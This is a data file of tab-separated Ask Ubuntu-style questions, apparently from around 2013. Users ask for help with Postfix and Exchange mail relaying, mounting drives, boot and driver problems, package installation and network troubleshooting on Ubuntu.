392045	postfix setup as a cloud mail gateway with exchange 2013 internally	we have a mail server on the cloud running postfix on ubuntu 12.0 , and recently we wanted to setup exchange for the sake of calendar sharing and address book also to integrate with sharepoint and lync . i can send from exchange clients to the outside world through our cloud server smarthost . i can send and receive from exchange clients internally . but when sending from gmail to the cloud server , i receive it on the cloud server but i never receive it on the internal exchange server . what i want to do is , i want emails to be forwarded to my internal exchange server . at the same time i want to keep a copy of the email in the cloud server . i 've been told that smtp relay will not leave a copy on the server ! ! ! if its what i need can you detail what i need to update in my main.cf file in /etc/postfix . on my firewall i have opened all the ports for connections from the cloud server , and the natted the connections to my internal exchange server . but still i can not receive emails .
392048	xdm floating icon on gnome shell but not in unity	so i installed xdm from this link , its already a deb file . the problem is i got xdm floating icon which is always on top of anything in gnome shell , but when i switched to unity , i do n't have this floating icon , and xdm icon sits nicely in unity panel . if i 'm not mistaken , apps that have panel indicator supposed to put their icon in notification bar in gnome shell ( the one that appear if you push your mouse cursor to the bottom of the screen , i do n't know what its called ) , but instead of that i got this blue floating icon . i do n't know whether its connected or not but upon installation usc gives me an error , but i ignored it . my question is , how do i remove this icon in gnome shell ? i already take a look here but i do n't have user themes extension enabled , so that question does n't apply to my problem .
392058	`` /usr/bin/ld : can not find -lx11 '' building firefox os ?	tried to build firefox os with ubuntu 13.10 and got this error : host sharedlib : libopenglrender ( out/host/linux-x86/obj/lib/libopenglrender.so ) /usr/bin/ld : can not find -lx11 /usr/bin/ld : can not find -lx11 collect2 : ld returned 1 exit status make : *** [ out/host/linux-x86/obj/lib/libopenglrender.so ] error 1 my system 's architecture is x86_64 with gcc 4.6.3
392059	how to change view of desktop popups ?	how i can change the color or view of desktop popups in ubuntu 13.10 ?
392060	help getting hdd mounted as root	thanks to all the tech gurus who are willing to help noobs like me ! i 'm trying to mount my hard drives in a way that plex media server will be able to access them . when trying to mount my secondary internal hdd , i get this error : error mounting : mount exited with exit code 1 : helper failed with : mount : only root can mount /dev/sdb1 on /mnt/media_sdb1
392063	how do i mount an encfs volume at /media/username/mountpoint ?	i am using gnome encfs manager [ 1 ] on ubuntu 13.10 . if i create an encrypted folder ( known as a stash ) and an unencrypted mountpoint , both in the home folder , it works . for example , ~/test-encrypted and ~/test-mountpoint . however , i can not create a mountpoint in the /media/myusername/ folder ( where usb drives and the like are mounted ) . i have tried : mounting to a non-existent folder , e.g . /media/myusername/newfolder creating a folder /media/myusername/createdfolder and selecting that as a mountpoint both result in the following error message , even though the mountpoint is empty or does not exist : the mount folder is not empty . permissions for the folders are as follows : /media $ ls -la total 12 drwxr-xr-x 3 root root 4096 dec 11 09:47 . drwxr-xr-x 23 root root 4096 dec 11 10:26 .. drwxr-x -- -+ 5 root root 4096 dec 17 10:29 username /media $ cd username /media/username $ ls -la total 17 drwxr-x -- -+ 5 root root 4096 dec 17 10:29 . drwxr-xr-x 3 root root 4096 dec 11 09:47 .. drwxr-xr-x 2 username username 4096 dec 11 09:49 attemptedmountpoint drwxr-xr-x 19 username username 4096 nov 22 11:52 workingmountpoint do i need set special permissions on the parent folder /media/myusername or on the new folder i want as a mountpoint ? or is there something else i should do ? [ 1 ] a gui for encfs mounting , currently installable via ppa from the link above .
392066	how can i fix this `` apt-key command not found `` ?	when try this command wget -o- -q http : //s3tools.org/repo/deb-all/stable/s3tools.key | sudo apt-key add - i am getting the message like this sudo : apt-key : command not found how can i fix this ? thanks rajaraman r
392068	ubuntu 12.04 hibernate error message acpi unable to dock & nohz local softirq pending 02	i am a green hand on ubuntu , but i would like to transfer to this system for open source . my system : ubuntu 12.04 ; thinkpad x220 since most of the time , i do n't want to turn off notebook but to hibernate ( to swap partition ) . i googled and found that i can use terminal command : sudo pm-hibernate until now the system works reasonably fine . it hibernates and resumes good . the only thing annoying me is that it always shows only two lines of error message on the black screen after i entered the command sudo pm-hibernate . the message is like this : [ 14918.582487 ] acpi : \_sb_.pci0.lpc_.ec__.bat1 : unable to dock ! [ 15997.051813 ] nohz : local_softirq_pending 02 though i have not noticed any undesired effects on my applications and files , it makes me feel not good , pretty annoying ! i also searched the /var/log/kern.log file , and the indeed found these two lines ( but at separate lines ) . i goodled but can not found any clues . could you guys help figure out how and where is the problem fromďź
392071	hourglass pointer launching a nemo quicklist sub-item from unitylauncher	running raring 13.04 i meet a strange behaviour ( non-blocking ) . when i launch a home subfolder ( e.g . music ) from the nemo launcher , the windows opens fine but i always get the hourglass pointer for 15s , after which the pointer becomes normal , whether i keep the window opened or i close it before the 15s laptime . i do n't use cinnamon ( not installed ) , just nemo v1.7.2 from synaptic/software center . when i run nemo music from a terminal or from the alt+f2 prompt , i do n't get this hourglass . i do n't get it neither when i just left-click the nemo parent icon . i do n't get this behaviour neither with libreoffice icon sub-items . i tried to specify the full path in ~/.local/share/applications/nemo.desktop ( exec=nemo /home/me/music ) with no change in behaviour . please , what does make this to happen ? thank you
392073	how to start mysql server after installing from mysql deb package ?	i installed the mysql-5.6.15-debian6.0-i686.deb file on a mysql site , and i installed it using the dpkg command but after that when i am writing : 1 ) sudo service mysql start the answer is : mysql : unrecognized service 2 ) dpkg -l |grep server no result came . how shall i attach the service from the /opt/mysql folder ?
392075	how to create banners in ubuntu ?	how can i create banners like this in ubuntu ?
392082	lag on server because of high mysql cpu usage	i am experiencing freeze on my server due to high cpu usage by the mysql process . i tried many configs in my.cnf but never get better results . i tried advice from mysqltuner , but is is n't helping ! what are the best configuration ( in absolute ) to reduce cpu usage of a mysql process ?
392084	ubuntu touch on motorola x or g	hope you guys are doing well ! i was curious to know if anyone knows if ubuntu touch is compatible with the new release from the motorola/google stable . or if they have attempted to or successfully installed it . the motorola g and motorola x. i understand that there are developer versions available on the market but have n't seen any communication or info on installing touch .
392085	how to get ubuntu touch on my phone device ?	i think there isnt a real version for an lg e340 so , how to make a version which is working for it and how do i get it after that on my phone ?
392089	boot repair - 'close all package managers ... ' dual boot installation	after almost a week i 've just about manged to install ubuntu 12.04.3 lts alongside windows 8 on a dell xps 14 ultrabook . i have created a partition in windows to store ubuntu , rebooted from windows advanced start up options menu to an efi usb containing ubuntu . i 've installed ubuntu on my chosen partition with 4gb swap area also set aside . during the install i get this error message : the 'grub-efi-amd64-signed ' package failed to install into /target/ . without grub boot loader , the installed system will no boot . after some searching , i read that i should use boot-repair , which i 've done following the instructions here . however , after running boot-repair and choosing the auto diagnose and repair option , i get a message to 'please close all your package managers ( software center , update manager , synaptic , ... ) then try again . ' can someone please help me with what i need to do next as it 's driving me mad ! ubuntu has installed ( if i try to reinstall on the same partition , my previous install is there ) - it just seems i need to fix this problem . please help - windows 8 is awful but i 'm getting very tired of the endless pushing a big rock up a steep hill that installing ubuntu is .
392091	additional drivers not showing up when syslinux.cfg is used to boot livecd straight to desktop	i have created a custom livecd of ubuntu 12.04.3 32bit using uck . i created a bootable usb using startup disk creator and i am able to detect and install additional drivers without a problem when a full installation is completed . however , after editing the syslinux.cfg file as show here , no additional drivers are found . i am editing the syslinux.cfg so the livecd goes straight to the desktop without prompting the user . i am able to run `` additional drivers '' in system settings and the hardware shows up when i run : lspci | grep vga but no drivers are detected .
392097	how do i install 32-bit libraries when they keep having uninstallable dependencies ?	i 'm trying to install adobe air on ubuntu 13.10 . in this version of ubuntu , packages like ia32-libs and ia32-libs-multiarch are no longer available , so i 'm trying to install the needed 32-bit libraries on my own . when running ./adobeairinstaller.bin i got several errors about missing libraries , most of which i managed to install using sudo apt-get install < library-name > : i386 and the errors went away . i 'm having issues fixing the last two missing modules though : gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' i tried installing overlay-scrollbar-gtk2 : i386 using apt : overlay-scrollbar-gtk2 : i386 : depends : overlay-scrollbar : i386 but it is not installable well darn , it depends on a package that ca n't be installed . how inconvenient . so i tried googling my way forth to the 32-bit overlay-scrollbar libraries for saucy , which i found here . first i installed overlay-scrollbar : $ sudo dpkg -i overlay-scrollbar_0.2.16+r359+13.10.20130826-0ubuntu1_all.deb ( reading database ... 226507 files and directories currently installed . ) preparing to replace overlay-scrollbar 0.2.16+r359+13.10.20130826-0ubuntu1 ( using overlay-scrollbar_0.2.16+r359+13.10.20130826-0ubuntu1_all.deb ) ... unpacking replacement overlay-scrollbar ... setting up overlay-scrollbar ( 0.2.16+r359+13.10.20130826-0ubuntu1 ) ... processing triggers for libglib2.0-0 : i386 ... processing triggers for libglib2.0-0 : amd64 ... great ! it worked . then i tried installing overlay-scrollbar-gtk2 : i386 : $ sudo dpkg -i overlay-scrollbar-gtk2_0.2.16+r359+13.10.20130826-0ubuntu1_i386.deb selecting previously unselected package overlay-scrollbar-gtk2 : i386 . ( reading database ... 226507 files and directories currently installed . ) unpacking overlay-scrollbar-gtk2 : i386 ( from overlay-scrollbar-gtk2_0.2.16+r359+13.10.20130826-0ubuntu1_i386.deb ) ... dpkg : dependency problems prevent configuration of overlay-scrollbar-gtk2 : i386 : overlay-scrollbar-gtk2 : i386 depends on overlay-scrollbar . dpkg : error processing overlay-scrollbar-gtk2 : i386 ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : overlay-scrollbar-gtk2 : i386 so apparently i still need to install overlay-scrollbar : i386 , which is not installable by apt and did n't get installed by the installer above . my issues with unity-gtk-module are pretty much identical but with different package names . i have a couple of very related questions regarding this : why are some very important 32-bit packages not installable using apt ? am i missing a source ? why did n't the i386 version of overlay-scrollbar get installed above ? is it because the installed contains both 32-bit and 64-bit versions of the library and automatically decided to install just the 64-bit one on my system ? can i force it to install both ?
392100	php excel installation gives error	i need to install php excel writer ( phpexcel ) in my machine running ubuntu 12.04 . but i do n't know what steps i need to follow . how can i install it ? i have tried sudo pear channel-discover pear.pearplex.net php warning : php startup : unable to load dynamic library '/usr/lib/php5/20090626/gd.so ' - /usr/lib/php5/20090626/gd.so : can not open shared object file : no such file or directory in unknown on line 0 discovering channel pear.pearplex.net over http : // failed with message : channel-add : can not open `` http : //pear.pearplex.net/channel.xml '' ( file http : //pear.pearplex.net:80/channel.xml not valid ( redirected but no location ) ) trying to discover channel pear.pearplex.net over https : // instead discovery of channel `` pear.pearplex.net '' failed ( channel-add : can not open `` https : //pear.pearplex.net/channel.xml '' ( connection to `pear.pearplex.net:443 ' failed : ) )
392101	help mounting an external hdd for use with media server	i 'm almost finished setting up my plex media server , but i 've gone wrong somewhere trying to mount my external 1.5tb ( sdc ) ... it 's mounted to ubuntu , but plex can not see the files ... not sure what to do so i 'll give sudo fdisk -l , sudo blkid , and sudo gedit /etc/fstab , hopefully that will be enough to spot the problem . $ sudo gedit /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=2f16dad8-494b-4cce-b3d6-aead00238b17 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=e881ffcf-37ab-43d1-b1a4-eb00581b7110 none swap sw 0 0 uuid=543e2fd13e2fab46 /mnt/media_sdb1 ntfs-3g defaults 0 0 uuid=e46014be6014997e /media/external ntfs-3g defaults , umask=0022 , fmask=0133 0 0 $ sudo blkid /dev/sda1 : uuid= '' 2f16dad8-494b-4cce-b3d6-aead00238b17 '' type= '' ext4 '' /dev/sda5 : uuid= '' e881ffcf-37ab-43d1-b1a4-eb00581b7110 '' type= '' swap '' /dev/sdb1 : label= '' i love you ! '' uuid= '' 543e2fd13e2fab46 '' type= '' ntfs '' /dev/sdc2 : label= '' killuminati - one '' uuid= '' e46014be6014997e '' type= '' ntfs '' $ sudo fdisk -l disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0007f670 device boot start end blocks id system /dev/sda1 * 2048 471801855 235899904 83 linux /dev/sda2 471803902 488396799 8296449 5 extended /dev/sda5 471803904 488396799 8296448 82 linux swap / solaris disk /dev/sdb : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x47d9be29 device boot start end blocks id system /dev/sdb1 2048 2930274303 1465136128 7 hpfs/ntfs/exfat warning : gpt ( guid partition table ) detected on '/dev/sdc ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdc : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 1 3907029167 1953514583+ ee gpt
392102	how to install latex in ubuntu 13.10	i recently installed ubuntu 13.10 on my computer . i want to install latex on my desktop but i am unable to install it . i first tried to install using following command : sudo apt-get install texlive-full but i am getting following error : e : package 'texlive-full ' has no installation candidate
392103	problem with ubuntu 12.04 shutdown	when ever i try to shut down my laptop with ubuntu 12.04 it starts processing for shutting down but after few statements comes back to login page . what should i do ? i 'm trying for so long and the last line after which it comes back to login page is : stopping v kernel system capabilities
392106	can i connect to my ubuntu session from my windows 7 session , both installed in the same computer ?	i have a windows 7 computer where i installed the ubuntu desktop using the wubi installer . therefore , when i start my computer i can choose between the windows and ubuntu sessions . however , i was wondering if i can go from one session to the other one without shutting down any of the sessions ?
392108	how to add two extensions number dialed by the user ?	i am new to asterisk and i have searched for my problem but of no avail . i just want to make a calculator doing the addition , multiplication , division and subtraction of user dialled extensions numbers . i have written the following code to multiply user dialled extensions . exten = > _x,1 , answer ( ) exten = > _x , n , waitexten ( 2 ) exten = > _x , n , read ( num1 ) exten = > _x , n , saynumber ( $ { num1 } ) exten = > _x , n , noop ( $ { num1 } ) exten = > _x , n , waitexten ( 2 ) exten = > _x , n , read ( num2 ) exten = > _x , n , saynumber ( $ { num2 } ) exten = > _x , n , noop ( $ { num2 } ) exten = > _x , n , waitexten ( 2 ) exten = > *,1 , set ( num3= $ [ { num1 } * $ { num2 } ] ) exten = > * , n , saynumber ( $ { num3 } ) and when executes it , and gives extensions num1=4 and num2=5 it comes with error , cli > gives : warning [ 2716 ] : ast_expr2.y:1452 op_times : non-numeric argument instead of an answer of num3=num1*num2=20 ( 4*5 )
392109	how do i install openxcom from the ppa repository ?	i open terminal , type the lines listed on the website : sudo add-apt-repository ppa : knapsu/openxcom sudo apt-get update sudo apt-get install openxcom and nothing happens .
392113	gnutls_handshake ( ) failed after using tor browser	after using tor browser , i ca n't use apt-get update and git pull . i downloaded tor browser source ( i did n't install it ) and opened it and used it . after using tor browser i 've noticed that i ca n't use git pull and apt-get update because of this error : gnutls_handshake ( ) failed : a tls packet with unexpected length was received . err https : //private-ppa.launchpad.net precise/main i386 packages i 've even changed gnutls to openssl but it still did n't work . unknown ssl protocol error in connection to gerrit.wikimedia.org:443 while accessing https : //gerrit.wikimedia.org/r/p/mediawiki/core.git/info/refs fatal : http request failed i stopped tor and restarted my computer but nothing fixed .
392114	how to get amd radeon hd 7900 woriking with ubuntu 13.10 inside vmware ?	after the upgrade of ubuntu to 13.10 the performance of my vm has degreased extremely and i think it is because no proprietary drivers seem to be available . the vm runs on decent system ( ssd , 4gb ram for the vm , i5 3570 ) and has worked fine before the update . no third party drivers are beeing offered through the update system ( hui ) . i have tried several tutorials to install the drivers manually but without success . the 7900 is listed as a supported card at the amd drivers page and i have tried both the stable and the beta release however without much success . after the last listed tutorial the system boots to the login screen where it returns after entering the password ( with a short black screen inbetween ) . vmware here is my xorg log ( /var/log/xorg.1.log ) at the place where the error occurs : i have also tried reinstalling vmware tools but without any change . the command lspci -nn | grep vga returns vga compatible controller [ 0300 ] : vmware svga ii adapter [ 15ad:0405 ] . even uninstalling did n't work , so i had to go back to a backup . so my question is : is it possible to run the latest catalyst drivers ( for the hd 7900 ) unter ubuntu 13.10 ( inside vmware ) ? should the performance be fine with the open source drivers ?
392116	ca n't bootubuntu 64-bit using virtual box on host windows 7 64-bit	the error i get says , this kernel requires and x86-64 cpu , but only detected an i686 cpu . unable to boot - please us a kernel appropriate for your cpu . i have enabled i/o apic .
392118	slime-lookup-definition not working with sbcl	one of the nicer things of programming with common lisp and the combination of emacs / slime is , that you can jump quickly to the source of builtin or your own functions with m+.. i ca n't get this to work however , for sbcl 's builtin functions . i have the package sbcl-source installed , but as you can see from this screenshot : if i choose the definition i want to visit ( the buffer to the right ) it only opens a empty buffer with the ( correct ) filename i wanted to see . how can i get the correct behaviour ? edit : i had the exact same problem with 13.04/12.10 . however , when using arch linux , this works flawlessly . edit : according to this post i added the sbcl-source path to my sbclrc . slime-xref is pointing to the correct file , but when i try to visit the desired function , i still only get an empty buffer .
392119	ubuntu wont come up	my windows vista os will not work . i installed ubuntu on a usb drive and put the usb drive at the top of the boot list so i can boot off ubuntu and install it but ubuntu will not come up . can you install ubuntu off a usb drive if your windows os is not working ?
392123	windows 8.1 and ubuntu desktop 13.10 dual boot problem	i installed ubuntu after windows 8.1 on different partitions . then i installed easybsd . i added an ubuntu partitions entry . then i selected `` grub2 '' but ubuntu can not open , the computer just waits . i reset then tried to load ubuntu but windows8.1 boot manager not grub2 comes up . my boot repair program report link : http : //paste.ubuntu.com/6589104/
392126	i need an equvalent to noteshelf for ubuntu	i am a new ubuntu user , and i am searching for the equivalent of noteshelf for ubuntu it does not have to be freeware it has to be as close as possible to noteshelf that is i need it for college ... any ideas ? thank you ...
392127	2 guest user created automatically in my ubuntu 13.10	i have locked my system and went out for a day in the evening ; when i returned , while unlocking , i noticed that there are 2 guest , 1 admin and 1 guest session . i am very much confused how this happened . note : my guest session does not have a password . before locking the system there was only 1 admin and 1 guest session , please help .
392130	how to install a latest ftp server in ubuntu by which we can manage multiple users ?	i want to install a ftp server in ubuntu using latest ppa . i want this ftp server should be multi user configurable . i mean i can simply add multiple user and set their root directories and permission as like as the filezilla ftp server . please help me how i can do this ...
392131	borders and title menus disappeared on ubuntu `` pop-up '' modal windows	i awoke this morning from uneasy dreams to find my ubuntu 12.04 's pop-ups transformed into a gigantic bug . i 'm not aware of having made any changes here , but the pop-ups look like this : you can see there 's no border around the pop-up , and no title menu allowing me to close or minimize it . same for thunderbird password prompts , the menus in gimp , etc. , so it is n't localized to browsers . these are pretty important for operating with my windows , especially in gimp . what happened and how can i fix it ?
392136	video accelerator display trouble	i 'm running 13.10 with gnome-fallback and a trinity radeon hd 7540 and i 'm encountering flickering ( among individual objects - not the whole display ) , screen regions being randomly shaded ( in at least firefox and libreoffice calc ) and object drawing failures ( the grid in a calc document ) . these problems can be reliably reproduced .
392138	how to disable or reassign unicode entry mode	how to disable or reassign unicode entry mode ( ctrl+shift+u ) so i can use this combination in applications ? ubuntu 13.10
392139	ubuntu `` black screen of death ''	i have only ubuntu 12.04 on my system . after i installed some updates , i restarted and the boot sequence would skip the grub menu and go straight to the first option ( normal ubuntu boot ) . even if i press shift or space , it would not load . it would start to load the ubuntu logo , then go black . if i press ctrl+alt+f1 then i am able to login , and run some commands , but if i go to the graphical mode ( ctrl+alt+f7 ) than it is stuck in the picture shown here . i want to boot via the recovery mode . i have n't tried boot-recovery , but i will . anything else i can do ? update # 1 : i removed timidity , and restarted ( in hindsight , timidity was n't the problem as it was the last thing that had [ ok ] next to it ) . now it boots , but it goes into a black screen after it displays the ubuntu logo , right before it is supposed to go into desktop . it 's not a black-screen-no-signal thing , it is like the background is all black . i tried booting from usb , and the same thing happened . i am slightly annoyed , because there is no apparent reason for this . now i ca n't even go into terminal . i happy to receive any suggestions .
392140	wifi only works after suspension	i ca n't connect to wi-fi and is showing that it 's turned off by hardware switch . the thing is that when i suspend the computer and turn it back on , wi-fi ignores this error and start working perfectly . already tried to fix it by sending asus-wmi to blacklist but it 's useless ( on some os that worked ) . ethernet always works properly and all the updates are installed btw . machine : asus x5dc
392141	ghostscript segmentation fault ( core dumped ) where it 's dumped ?	i 'm trying to convert pdf to jpg with command : gs -dusetrimbox -dnopause -dsafer -dbatch -sdevice=jpeg -dgraphicsalphabits=4 -dtextalphabits=4 -dfirstpage=1 -dlastpage=1 -dnumrenderingthreads=2 -soutputfile=/fileout.jpg -djpegq=80 -r188 -f filein.pdf in ubuntu 12.04 server and ghostscript version 9.07 ( builded from source ) . result is just message : processing pages 1 through 1 . page 1 segmentation fault ( core dumped ) my question is : where the core is dumped ? what can be wrong in this pdf ? other pages in this same pdf is created without error . this same error happends randomly in other pdf : s too .
392143	hard drive light is constantly on . what 's using it ?	the hdd light is lit solid all day and the system has slowed significantly . running i7 with 15.3gb ram on 10.04 read though many threads online and checked the i/o which seems to be negligible and only writing to the journal - jbd2/sda1-8 the fsdsk shows that sda1 is healthy and in good form . looking at glances things look good : ubuntu 10.04 32bit with linux 2.6.32-54-generic-pae on # # # # # # cpu 2.7 % load 8-core mem 12.2 % swap 0.0 % user : 1.5 % nice : 0.0 % 1 min : 0.38 total : 15.3g total : 4.88g system : 1.2 % iowait : 0.0 % 5 min : 0.47 used : 1.87g used : 0 idle : 97.3 % irq : 0.0 % 15 min : 0.53 free : 13.4g free : 4.88g network rx/s tx/s processes 273 , 1 running , 272 sleeping , 0 other eth0 336b 288b lo 0b 0b virt res cpu % mem % pid user name 83m 64m 4.5 0.4 1524 root xorg disk i/o in/s out/s 14m 9m 3.2 0.1 4130 igie glances sda1 0 0 58m 19m 2.6 0.1 3615 igie gnome-terminal sda2 0 0 2.6g 1.0g 1.9 6.6 2452 igie blender sda5 0 0 81m 66m 1.6 0.4 1827 igie compiz sdb1 0 0 167m 23m 1.0 0.1 1829 igie pulseaudio sdc 0 0 0 0 0.3 0.0 67 root ata/5 5m 1000k 0.3 0.0 1859 root udisks-daemon mount used total 654m 156m 0.3 1.0 2217 igie chrome / 81.6g 113g 3m 2m 0.0 0.0 1 root /sbin/init _a/media 288g 587g 0 0 0.0 0.0 2 root kthreadd _windows 41.3g 58.7g 0 0 0.0 0.0 3 root migration/0 blender is running . but its not doing anything.. just sitting there.. even if i close blender the hdd light still stays on ... trying to figure out what 's slowing down the system ...
392145	ubuntu 12.04 no internet connection	i have a laptop that dual boots to either ubuntu 12.04 or windows 7 , but the i ca n't seem to do anything requiring an internet connection on the ubuntu side . i 've been through the troubleshooting guide of clearing cache , restarting , etc . to no avail . the wireless icon on the top menu shows that i am connected to my wifi network but firefox does n't work and i ca n't use ssh or sftp protocols either . the error message i get with firefox is `` server not found . '' any ideas are appreciated ! ifconfig : eth0 link encap : ethernet hwaddr e8:03:9a:34:9d:1d up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:41 base address:0x8000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1409 errors:0 dropped:0 overruns:0 frame:0 tx packets:1409 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:125628 ( 125.6 kb ) tx bytes:125628 ( 125.6 kb ) wlan0 link encap : ethernet hwaddr 88:53:2e:94 : c2 : b7 inet addr:192.168.1.103 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :8a53:2eff : fe94 : c2b7/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:594 errors:0 dropped:0 overruns:0 frame:0 tx packets:1109 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:172548 ( 172.5 kb ) tx bytes:84207 ( 84.2 kb ) ping google.com : ping : unknown host google.com ls -ld /etc/resolv.conf : lrwxrwxrwx 1 root root 29 aug 17 2012 /etc/resolv.conf - > ../run/resolvconf/resolv.conf cat /etc/resolv.conf : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search hsd1.fl.comcast.net ping -c4 192.168.1.1 : ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data . -- - 192.168.1.1 ping statistics -- - 4 packets transmitted , 0 received , 100 % packet loss , time 2999ms ping 192.168.1.1 : ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data . from 192.168.1.103 icmp_seq=1 destination host unreachable from 192.168.1.103 icmp_seq=2 destination host unreachable from 192.168.1.103 icmp_seq=5 destination host unreachable from 192.168.1.103 icmp_seq=6 destination host unreachable from 192.168.1.103 icmp_seq=7 destination host unreachable from 192.168.1.103 icmp_seq=8 destination host unreachable ^c -- - 192.168.1.1 ping statistics -- - 11 packets transmitted , 0 received , +6 errors , 100 % packet loss , time 10056ms pipe 3 route -n : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 2 0 0 wlan0 dmesg | grep wlan0 : [ 28.289967 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 28.290703 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 35.980297 ] wlan0 : authenticate with 00:23:69 : c6 : c9 : c8 ( try 1 ) [ 35.984082 ] wlan0 : authenticated [ 35.992776 ] wlan0 : associate with 00:23:69 : c6 : c9 : c8 ( try 1 ) [ 35.998868 ] wlan0 : rx assocresp from 00:23:69 : c6 : c9 : c8 ( capab=0x411 status=0 aid=4 ) [ 35.998872 ] wlan0 : associated [ 36.003690 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 46.419609 ] wlan0 : no ipv6 routers present ifconfig ( again ) : eth0 link encap : ethernet hwaddr e8:03:9a:34:9d:1d up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:41 base address:0x8000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:147 errors:0 dropped:0 overruns:0 frame:0 tx packets:147 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:13468 ( 13.4 kb ) tx bytes:13468 ( 13.4 kb ) wlan0 link encap : ethernet hwaddr 88:53:2e:94 : c2 : b7 inet addr:192.168.1.103 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :8a53:2eff : fe94 : c2b7/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:65 errors:0 dropped:0 overruns:0 frame:0 tx packets:213 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:20780 ( 20.7 kb ) tx bytes:55633 ( 55.6 kb )
392147	install ubuntu 12.04 from usb fails	i am attempting to install 12.04 from a 4gb flash drive . i installed the .iso file using universal usb installer , no problems . i restarted my computer and the ubuntu installer booted just fine , so i went through the steps up to choosing installation options of either dual boot or replacing windows ( i am running windows 7 ) . i selected dual boot and the installer said it would restart to continue the install process . when it restarted , it went right back to the first installation step , not saving any of my progress . i checked for damaged files and came back with 3 corrupted files . i re-downloaded ubuntu 12.04 , re-installed on my flash drive , and tried again , only to get the exact same result . any suggestions ?
392152	how can i filter https using dansguardian	i want to use dansguardian on my pc so that it also filters https between my browser and the internet . i am ready to trust this proxy , so a solution like man in the middle attack is also acceptable . please suggest a solution and give directions on how it can be implemented . also is there a browser that has dansguardian like filtering built in ? i want something like that . thanks .
392154	why are the default permissions for /media/username root : root ?	i have tweaked the permissions on /media/username from root : root to username : root [ 1 ] . i understand that a user-centric location allows user-centric permissions [ 2 ] . but why were the permissions for this folder root : root in the first place ? [ 1 ] so that i can mount encrypted folders there with gnome encfs manager . for example , i can now mount an encrypted folder as /media/username/personal-documents . [ 2 ] from why has ubuntu moved the default mount points ? : the root cause for this change of default behaviour in udisks2 seems clear : the security . it is safer to restrict access to a file system to one particular user instead of giving access to it to all the users of the system .
392155	is possible to boot ubuntu with less than 128mb of ram ?	the machine i would like to install a working os to is an old toshiba portege 3010ct notebook ( pentium 266 with 32mb edo ram and 4gb ide hard drive ) . it 's a quite slow and weak machine , but it 's only needed for basic text editing , usb support ( as it has 1x usb connector ) , and mp3 playing if it can handle that . the machine is flawless and is in working condition . the bios it has is very basic and limited , and it can be only booted from either the hard drive or the floppy drive.. but here comes the twist : it does not have a floppy drive . it also lacks a cd-rom , and it can not boot from usb ( no bios support ) . the only option is to boot from the hard drive . my only option to write to the hard drive is by removing it from the notebook , and plug it into my laptop via ide to usb cable . i do n't have a desktop machine to mount into as an internal hard drive . i am really hoping that someone knows how to make a bootable os under these circumstances , as it can be very tricky to set up a hard drive on usb to work later on in ide mode . i experimented with a lot of operating systems in the past few weeks ( dos , win98 , winxp , wary puppy ( linux ) ) , repartitioned and reformatted the hard drives many times for the specific needs of the different operating systems , rewrote the mbr if it was needed , but i done it all the time via usb , and i think that is the main problem . because when i try to boot from the hard drive it is running as an internal ide drive . i dont know what/how to edit manually so that an actual operating system would install from the hard drive to the hard drive , or better , if it can be installed manually ( by copying the needed files , and it would simpy boot ) . any idea or solution is welcome ! ! : )
